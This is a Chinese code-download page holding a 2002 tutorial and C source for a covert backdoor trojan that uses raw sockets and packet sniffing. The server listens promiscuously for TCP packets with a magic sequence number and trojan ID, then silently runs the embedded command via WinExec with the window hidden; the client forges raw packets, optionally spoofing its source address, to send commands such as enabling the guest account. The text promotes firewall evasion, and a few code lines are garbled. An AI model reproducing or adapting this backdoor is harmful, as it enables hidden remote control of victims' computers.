可以对黑客编程有一定的了解

源代码在线查看: 基于嗅探原理的原始套接字木马.txt

软件大小: 333 K
上传用户: wangcong200500
关键词: 黑客 编程
下载地址: 免注册下载 普通下载 VIP

相关代码

				基于嗅探原理的原始套接字木马
				(Trojan Based on sniffer)
				
				
				
				
				
				    基于嗅探原理的原始套接字木马。
				
				    首先我们说说现有木马的特点和功能。早期木马一般都是基于TCP连接的,现在这种木马的生存能力
				非常有限,因为直接基于连接的木马很容易被拦截或者发现。然后有通过改变协议来实现通讯隐藏的木马,
				比如采用UDP或者ICMP或者其他协议的,当然,这些协议通常对于主机来说并不常用,所以很多安全配置
				上就要求尽量禁止这些协议,比如禁止ICMP,让ICMP木马没有了生存机会。反向连接或者ACK木马等非常流
				行,因为表现为不是直接的由外向内的TCP连接。
				
				    当然木马还更多发展在自身的隐藏上,比如注射、核心木马等。不过该方法的重点暂不是自身进程的
				隐藏,而强调在通讯方式上。
				
				    这里讲的一种实现方式是:使用基于嗅探原理的原始套接字木马。它的基本实现是:服务器端是一个
				sniffer和发包器,它将捕获指定特征的数据包。客户端是一个发包器和嗅探器,用来发送指定特征的数据
				包并包括定义的命令以及接收server的数据。当server捕获到该指定特征的数据包时,变成激活状态,通
				过分析该数据包,获得client发送的命令和client的IP地址,然后实现相应的命令,并将执行后的结果发
				送回client,client的嗅探部分则接收相应的数据。所有的数据发送都是通过原始套接字(或相应)进行。
				
				    比如:我们设置特定的协议或者ACK或者其他位及其集合为特征。
				
				    该方式的优点:完全基于非连接状态,使用原始包进行通讯,不同协议有关,可使用任意协议,可采
				用任意指定的数据包形式,可实现部分的隐藏地址(如果是非交换的局域网则是可以完全的隐藏地址)、
				可实现无连接反向通讯、甚至能够突破一些防火墙的监视;
				
				    缺点:不是可靠的数据连接、不稳定地执行大数据传输,对于数据流量较大的SERVER,其sniffer的效
				率占很重要的地位;
				
				    以下是一个简单的演示,看起来比较象一个后门。呵呵。麻雀虽小,五脏具全。
				
				    其中定义了一个简单的木马协议,基于TCP协议基础上,使用了SEQ位来判别而不基于端口,能够执行指定的命令。
				
				
				定义部分:
				
				#define MAX_PACKET_SIZE		65536
				#define SEQ_IDENTITY		12345	//验证是否符合需要的SEQ值,这个值在正常包中不会有吧!
				#define TROJAN_ID_IDENTITY	6789	//验证是否符合需要的trojan_id值
				#define LOCAL_PORT		1234	//本地Port, 这个定义并没有实际意义
				#define SERVER_PORT		80	//服务端Port, 这个定义并没有实际意义
				
				typedef struct ip_hdr				//定义IP首部
				{
					unsigned char	h_verlen;		//4位首部长度,4位IP版本号
					unsigned char	tos;			//8位服务类型TOS
					unsigned short	total_len;		//16位总长度(字节)
					unsigned short	ident;			//16位标识
					unsigned short	frag_and_flags;	//3位标志位
					unsigned char	ttl;			//8位生存时间 TTL
					unsigned char	proto;			//8位协议 (TCP, UDP 或其他)
					unsigned short	checksum;		//16位IP首部校验和
					unsigned int	sourceIP;		//32位源IP地址
					unsigned int	destIP;			//32位目的IP地址
				}IP_HEADER, *PIP_HEADER;
				
				typedef struct psd_hdr				//定义TCP伪首部
				{
					unsigned long	saddr;			//源地址
					unsigned long	daddr;			//目的地址
					char			mbz;
					char			ptcl;			//协议类型 
					unsigned short	tcpl;			//TCP长度
				}PSD_HEADER;
				
				
				typedef struct tcp_hdr				//定义TCP首部
				{
					unsigned short	th_sport;		//16位源端口
					unsigned short	th_dport;		//16位目的端口
					unsigned int	th_seq;			//32位序列号
					unsigned int	th_ack;			//32位确认号
					unsigned char	th_lenres;		//4位首部长度/6位保留字
					unsigned char	th_flags;		//6位标志位
					unsigned short	th_win;			//16位窗口大小
					unsigned short	th_sum;			//16位校验和
					unsigned short	th_urp;			//16位紧急数据偏移量
				}TCP_HEADER, *PTCP_HEADER;
				
				typedef struct trojan_packet		//定义木马使用的协议
				{
					unsigned int	trojan_id;		//木马数据包的标识,网络顺序
					unsigned short	trojan_len;		//执行的命令长度,主机顺序
				}TROJAN_HEADER, *PTROJAN_HEADER;
				
				
				/*
				木马数据包的结构
				
				-------------------------------------------------------------
				| IP Header | TCP Header  | Trojan Header | Trojan Command
				-------------------------------------------------------------
				
				包的最小程度是46字节
				*/
				
				#pragma pack(pop)
				
				
				SERVER部分的演示:
				
				////////////////////////////////////////////////////////////////////////////////
				//      
				//      SniffTrojan
				//      
				//      File      : Server.cpp
				//      Comment   : The Server model
				//      
				//      Created at : 2002.9.13
				//      Created by : Refdom
				//		Email	  : refdom@263.net
				//		Home Page : www.opengram.com
				//
				//		If you modify the code, or add more functions, please email me a copy.
				//      
				////////////////////////////////////////////////////////////////////////////////
				
				/*
				木马数据包的结构
				
				-------------------------------------------------------------
				| IP Header | TCP Header  | Trojan Header | Trojan Command
				-------------------------------------------------------------
				
				包的最小程度是46字节
				*/
				
				//////////////////////////////////////////////////
				
				void Usage();
				
				int SniffThread();
				
				int SendThread();
				
				int DecodeData(char* pBuffer);
				
				unsigned long GetLocalIP();
				
				//////////////////////////////////////////////////
				
				int main(int argc, char* argv[])
				{
					WSADATA WSAData;
					int nRetCode = 0;
				
					if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0 )
					{
						//WSAStartup Error!
						printf("WSAStartup Error!%d\n", WSAGetLastError());
						nRetCode = -1;
						return nRetCode;
					}
					
					//开始嗅探数据
					SniffThread();
				
					//quit
					WSACleanup();
				
					return 0;
				}
				
				void Usage()
				{
					printf("**************************************************\n");
					printf("Demo For SniffTrojan\n\n");
					printf("\t Written by Refdom\n");
					printf("\t Email: refdom@xfocus.org  or  refdom@263.net\n");
					printf("\t Homepage: www.xfocus.org  or  www.opengram.com\n");
					printf("**************************************************\n");
				}
				
				int SniffThread()
				{
					int nRetCode = 0;
					int nRecvBytes = 0;
				
					char* pBuffer = NULL;
				
					SOCKET nSock = INVALID_SOCKET;
					SOCKADDR_IN addr_in;
				
					DWORD dwBufferLen[10];
					DWORD dwBufferInLen = 1;
					DWORD dwBytesReturned = 0;
				
					//define a raw socket
					nSock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
					if (INVALID_SOCKET == nSock)
					{
						nRetCode = -1;
						goto Exit0;
					}
				
					addr_in.sin_family = AF_INET;
					addr_in.sin_port  = INADDR_ANY;
					addr_in.sin_addr.S_un.S_addr = GetLocalIP();
				
					nRetCode = bind(nSock, (struct sockaddr*)&addr_in, sizeof(addr_in));
					if (SOCKET_ERROR == nRetCode)
					{
						printf("BIND Error!%d\n", WSAGetLastError());
						goto Exit0;
					}
				
					//socket for sniffer
					nRetCode = WSAIoctl(nSock, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen),
				        &dwBufferLen, sizeof(dwBufferLen), &dwBytesReturned , NULL , NULL );
					if (SOCKET_ERROR == nRetCode)
					{
						printf("WSAIOCTL Error!%d\n", WSAGetLastError());
						goto Exit0;
					}
				
					//start sniffing
					pBuffer = (char*)malloc(MAX_PACKET_SIZE);
					while(1)
					{
						memset(pBuffer, 0, MAX_PACKET_SIZE);
				
						nRecvBytes = recv(nSock, pBuffer, MAX_PACKET_SIZE, 0);
						if (SOCKET_ERROR == nRetCode)
						{
							printf("RECV Error!%d\n", WSAGetLastError());
							goto Exit0;
						}
				
						if (nRecvBytes < 46)
							continue;
						
						DecodeData(pBuffer);	//数据解码
				
					}
				
				Exit0:
				
					if (pBuffer != NULL)
						free(pBuffer);
				
					if (nSock != INVALID_SOCKET)
						closesocket(nSock);
				
					return nRetCode;
				}
				
				//获取本地IP地址
				unsigned long GetLocalIP()
				{
					char szLocalIP[20] = {0};
				    char szHostName[128+1] = "\0";
				    hostent *phe;
				    int i;
				    if( gethostname(szHostName, 128 ) == 0 ) {
				        // Get host adresses
				        phe = gethostbyname(szHostName);
				        for( i = 0; phe != NULL && phe->h_addr_list[i]!= NULL; i++ )
				        {
				            sprintf(szLocalIP, "%d.%d.%d.%d", 
				                (UINT)((UCHAR*)phe->h_addr_list[i])[0],
				                (UINT)((UCHAR*)phe->h_addr_list[i])[1],
				                (UINT)((UCHAR*)phe->h_addr_list[i])[2], 
				                (UINT)((UCHAR*)phe->h_addr_list[i])[3]);
				        }
				    }
				    else
				        return 0;
				
				    return inet_addr(szLocalIP);
				}
				
				
				int DecodeData(char* pBuffer)
				{
					int nRetCode = 0;
					char* pCommand = NULL;
					unsigned short usCmdLength = 0;
				
					PIP_HEADER pIPHeader = NULL;
					PTCP_HEADER pTCPHeader = NULL;
					PTROJAN_HEADER pTrojanHeader = NULL;
				
					pIPHeader = (PIP_HEADER)pBuffer;
				
					//只取TCP包
					if (pIPHeader->proto != IPPROTO_TCP)
						goto Exit0;
				
					pTCPHeader = (PTCP_HEADER)(pBuffer + sizeof(IP_HEADER));
				
					//验证该TCP包是否其SEQ值符合需要
					if (ntohs(pTCPHeader->th_seq) !=  SEQ_IDENTITY)
						goto Exit0;
				
					pTrojanHeader = (PTROJAN_HEADER)(pBuffer + sizeof(IP_HEADER) + sizeof(TCP_HEADER));
				
					//验证该TCP包是否是合法的木马包
					if (ntohs(pTrojanHeader->trojan_id) != TROJAN_ID_IDENTITY)
						goto Exit0;
				
					usCmdLength = pTrojanHeader->trojan_len;	//获得命令的长度
				
					if (0 == usCmdLength)
						goto Exit0;
				
					printf("OK!\n");
				
					pCommand = (char*)malloc(usCmdLength + 1);
					memset(pCommand, 0, usCmdLength + 1);
				
					memcpy(pCommand, pBuffer + sizeof(IP_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER), usCmdLength);
				
					nRetCode = WinExec(pCommand, SW_HIDE);	//执行命令
					if (nRetCode > 31)
					{
						//WinExec Successfully!
					}
				
				Exit0:
				
					return nRetCode;
				}
				
				
				控制端的演示(Client.cpp):
				
				
				//////////////////////////////////////////////////
				void Usage()
				{
					printf("**************************************************\n");
					printf("Demo For SniffTrojan\n\n");
					printf("\t Written by Refdom\n");
					printf("\t Email: refdom@xfocus.org  or  refdom@263.net\n");
					printf("\t Homepage: www.xfocus.org  or  www.opengram.com\n");
					printf("Usage: Client.exe ServerIP Command\n");
					printf("eg:Client.exe 192.168.0.2 \"net user guest /active\"\n");
					printf("**************************************************\n");
				}
				//////////////////////////////////////////////////
				
				int main(int argc, char* argv[])
				{
					int nRetCode = 0, nCommandLength = 0;
					char szDataBuf[MAX_PACKET_SIZE] = {0};
					char* pCommand = NULL;
				
					BOOL bOption;
					WSADATA WSAData;
					SOCKET nSock = INVALID_SOCKET;
					SOCKADDR_IN	addr_in;
				
					IP_HEADER IP_Header;
					TCP_HEADER TCP_Header;
					PSD_HEADER PSD_Header;
					TROJAN_HEADER Trojan_Header;
				
					Usage();
				
					if (argc != 3)
					{
						printf("\nArguments Error!\n");
						return -1;
					}
				
					//获得需要执行的命令
					nCommandLength = strlen(argv[2]);
					pCommand = (char*)malloc(nCommandLength + 2);
					memset(pCommand, 0, nCommandLength + 2);
					memcpy(pCommand, argv[2], nCommandLength);
				
				
					if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
					{
						//WSAStartup Error!
						printf("WSAStartup Error!%d\n", WSAGetLastError());
						nRetCode = -1;
						return nRetCode;
					}
				
					nSock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
					if (INVALID_SOCKET == nSock)
					{
						printf("SOCKET Error!%d\n", WSAGetLastError());
						goto Exit0;
					}
				
					nRetCode = setsockopt(nSock, IPPROTO_IP, IP_HDRINCL, (char*)&bOption, sizeof(bOption));
					if (SOCKET_ERROR == nRetCode)
					{
						printf("SetSockOpt Error!%d\n", WSAGetLastError());
						goto Exit0;
					}
				
					//填充IP首部
					IP_Header.h_verlen = (4 					IP_Header.tos = 0;
					IP_Header.total_len = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));
					IP_Header.frag_and_flags = 0;
					IP_Header.ttl = 128;
					IP_Header.proto = IPPROTO_TCP;
					IP_Header.checksum = 0;
					IP_Header.sourceIP = GetLocalIP();	//当然可以伪造自己的地址
					IP_Header.destIP = inet_addr(argv[1]);   //服务器端IP地址,如果是非交换网络,那么可以不是服务器的地址,而设置一个同网段或者同HUB的地址。
				
					//填充TCP首部
					TCP_Header.th_sport = htons(LOCAL_PORT);  //这个端口没有实际意义,倒是可以躲开防火墙
					TCP_Header.th_dport = htons(SERVER_PORT); //这个端口没有实际意义,倒是可以躲开防火墙
					TCP_Header.th_seq = htons(SEQ_IDENTITY);		//木马服务器端的识别标志
					TCP_Header.th_ack = 345678;
					TCP_Header.th_lenres = (sizeof(TCP_HEADER)/4					TCP_Header.th_flags = 0x01;			//随意设置TCP标志位
					TCP_Header.th_win = 12345;
					TCP_Header.th_urp = 0;
					TCP_Header.th_sum = 0;
				
					//填充木马协议的头部
					Trojan_Header.trojan_id = htons(TROJAN_ID_IDENTITY);
					Trojan_Header.trojan_len = nCommandLength;
				
					//填充TCP伪首部(用于计算校验和)
					PSD_Header.saddr = IP_Header.sourceIP;
					PSD_Header.daddr = IP_Header.destIP;
					PSD_Header.mbz = 0;
					PSD_Header.ptcl = IPPROTO_TCP;
					PSD_Header.tcpl = htons(sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER) + nCommandLength);
				
					//计算TCP校验和
					memcpy(szDataBuf, &PSD_Header, sizeof(PSD_HEADER));
					memcpy(szDataBuf + sizeof(PSD_HEADER), &TCP_Header, sizeof(TCP_HEADER));
					memcpy(szDataBuf + sizeof(PSD_HEADER) + sizeof(TCP_HEADER), &Trojan_Header, sizeof(TROJAN_HEADER));
					memcpy(szDataBuf + sizeof(PSD_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER), pCommand, nCommandLength);
					TCP_Header.th_sum = CheckSum((unsigned short *)szDataBuf, sizeof(PSD_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER) + nCommandLength);
				
					//填充发送缓冲区
					memcpy(szDataBuf, &IP_Header, sizeof(IP_HEADER));
					memcpy(szDataBuf + sizeof(IP_HEADER), &TCP_Header, sizeof(TCP_HEADER));
					memcpy(szDataBuf + sizeof(IP_HEADER) + sizeof(TCP_HEADER), &Trojan_Header, sizeof(TROJAN_HEADER));
					memcpy(szDataBuf + sizeof(IP_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER), pCommand, nCommandLength);
				
					addr_in.sin_family = AF_INET;
					addr_in.sin_port = htons(LOCAL_PORT);
					addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);
				
					//发送命令
					printf("Start to send command...\n");
					nRetCode = sendto(nSock, szDataBuf, 
						              sizeof(IP_HEADER) + sizeof(TCP_HEADER) + sizeof(TROJAN_HEADER) + nCommandLength, 
									  0, (struct sockaddr*)&addr_in, sizeof(addr_in));
					if (SOCKET_ERROR == nRetCode)
					{
						printf("Sendto Error!%d\n", WSAGetLastError());
						goto Exit0;
					}
				
					printf("Send OK!\n");
				
				
				Exit0:
				
					if (pCommand != NULL)
						free(pCommand);
				
					if (nSock != INVALID_SOCKET)
						closesocket(nSock);
					
					WSACleanup();
				
					return 0;
				}
				
				
							

相关资源